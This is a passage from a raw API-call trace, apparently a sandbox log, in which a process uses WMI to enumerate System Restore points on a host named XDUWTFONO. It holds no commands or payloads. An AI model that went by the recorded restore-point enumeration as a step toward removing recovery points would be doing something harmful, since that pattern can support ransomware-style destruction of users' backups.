Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.272] WbemDefPath:IUnknown:Release (This=0xbb5ac8) returned 0x3 [0122.272] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.275] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.281] WbemDefPath:IUnknown:Release (This=0x60244f8) returned 0x2 [0122.281] WbemDefPath:IUnknown:Release (This=0x60244f8) returned 0x1 [0122.281] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.282] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60244f8) returned 0x0 [0122.282] WbemDefPath:IUnknown:AddRef (This=0x60244f8) returned 0x3 [0122.282] WbemDefPath:IUnknown:Release (This=0x60244f8) returned 0x2 [0122.283] WbemDefPath:IWbemPath:SetText (This=0x60244f8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.283] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.283] IWbemClassObject:Get (in: This=0x6023e90, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389e95c*=0, plFlavor=0x389e960*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), pType=0x389e95c*=19, plFlavor=0x389e960*=0) returned 0x0 [0122.284] IWbemClassObject:Get (in: This=0x6023e90, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389e95c*=19, plFlavor=0x389e960*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), pType=0x389e95c*=19, plFlavor=0x389e960*=0) returned 0x0 [0122.284] CoTaskMemAlloc (cb=0x4) returned 0xbe1498 [0122.284] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1498, puReturned=0x389bfe4 | out: apObjects=0xbe1498*=0x60245e0, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.308] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x60245e0) returned 0x0 [0122.308] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.312] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.315] IUnknown:AddRef (This=0x60245e0) returned 0x3 [0122.315] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.315] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.315] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x60245e4) returned 0x0 [0122.315] IMarshal:GetUnmarshalClass (in: This=0x60245e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.345] IUnknown:Release (This=0x60245e4) returned 0x3 [0122.346] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.346] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.346] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.346] IUnknown:Release (This=0x60245e0) returned 0x2 [0122.346] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.346] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.347] IUnknown:QueryInterface (in: This=0x60245e0, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x60245e0) returned 0x0 [0122.347] IUnknown:AddRef (This=0x60245e0) returned 0x4 [0122.347] IUnknown:Release (This=0x60245e0) returned 0x3 [0122.348] IUnknown:Release (This=0x60245e0) returned 0x2 [0122.348] CoTaskMemFree (pv=0xbe1498) [0122.348] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.348] IUnknown:AddRef (This=0x60245e0) returned 0x3 [0122.348] IWbemClassObject:Get (in: This=0x60245e0, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.350] IWbemClassObject:Get (in: This=0x60245e0, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.350] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x6e [0122.352] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x6e [0122.355] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.357] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.357] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.357] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.395] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024860) returned 0x0 [0122.395] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024860, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.395] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024860, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6024c48) returned 0x0 [0122.396] WbemDefPath:IUnknown:Release (This=0x6024860) returned 0x0 [0122.396] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6024c48) returned 0x0 [0122.396] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.396] WbemDefPath:IUnknown:AddRef (This=0x6024c48) returned 0x3 [0122.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1498) returned 0x0 [0122.397] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1498, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.397] WbemDefPath:IUnknown:Release (This=0xbe1498) returned 0x3 [0122.397] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.397] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.397] WbemDefPath:IUnknown:Release (This=0x6024c48) returned 0x2 [0122.397] WbemDefPath:IUnknown:Release (This=0x6024c48) returned 0x1 [0122.397] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.397] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c48, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6024c48) returned 0x0 [0122.397] WbemDefPath:IUnknown:AddRef (This=0x6024c48) returned 0x3 [0122.397] WbemDefPath:IUnknown:Release (This=0x6024c48) returned 0x2 [0122.397] WbemDefPath:IWbemPath:SetText (This=0x6024c48, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x0 [0122.397] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.397] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.398] IWbemClassObject:Get (in: This=0x60245e0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389f1a4*=0, plFlavor=0x389f1a8*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), pType=0x389f1a4*=19, plFlavor=0x389f1a8*=0) returned 0x0 [0122.398] IWbemClassObject:Get (in: This=0x60245e0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389f1a4*=19, plFlavor=0x389f1a8*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), pType=0x389f1a4*=19, plFlavor=0x389f1a8*=0) returned 0x0 [0122.398] CoTaskMemAlloc (cb=0x4) returned 0xbe14d8 [0122.398] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe14d8, puReturned=0x389bfe4 | out: apObjects=0xbe14d8*=0x6024d30, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6024d30) returned 0x0 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.400] IUnknown:AddRef (This=0x6024d30) returned 0x3 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6024d34) returned 0x0 [0122.400] IMarshal:GetUnmarshalClass (in: This=0x6024d34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.400] IUnknown:Release (This=0x6024d34) returned 0x3 [0122.400] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.400] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.400] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.400] IUnknown:Release (This=0x6024d30) returned 0x2 [0122.400] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.400] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.401] IUnknown:QueryInterface (in: This=0x6024d30, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6024d30) returned 0x0 [0122.401] IUnknown:AddRef (This=0x6024d30) returned 0x4 [0122.401] IUnknown:Release (This=0x6024d30) returned 0x3 [0122.401] IUnknown:Release (This=0x6024d30) returned 0x2 [0122.401] CoTaskMemFree (pv=0xbe14d8) [0122.401] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.401] IUnknown:AddRef (This=0x6024d30) returned 0x3 [0122.401] IWbemClassObject:Get (in: This=0x6024d30, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.401] IWbemClassObject:Get (in: This=0x6024d30, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.401] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x6e [0122.401] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x6e [0122.401] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.401] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.401] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.401] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.402] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024870) returned 0x0 [0122.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024870, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.402] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024870, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6024f98) returned 0x0 [0122.403] WbemDefPath:IUnknown:Release (This=0x6024870) returned 0x0 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6024f98) returned 0x0 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.403] WbemDefPath:IUnknown:AddRef (This=0x6024f98) returned 0x3 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.403] 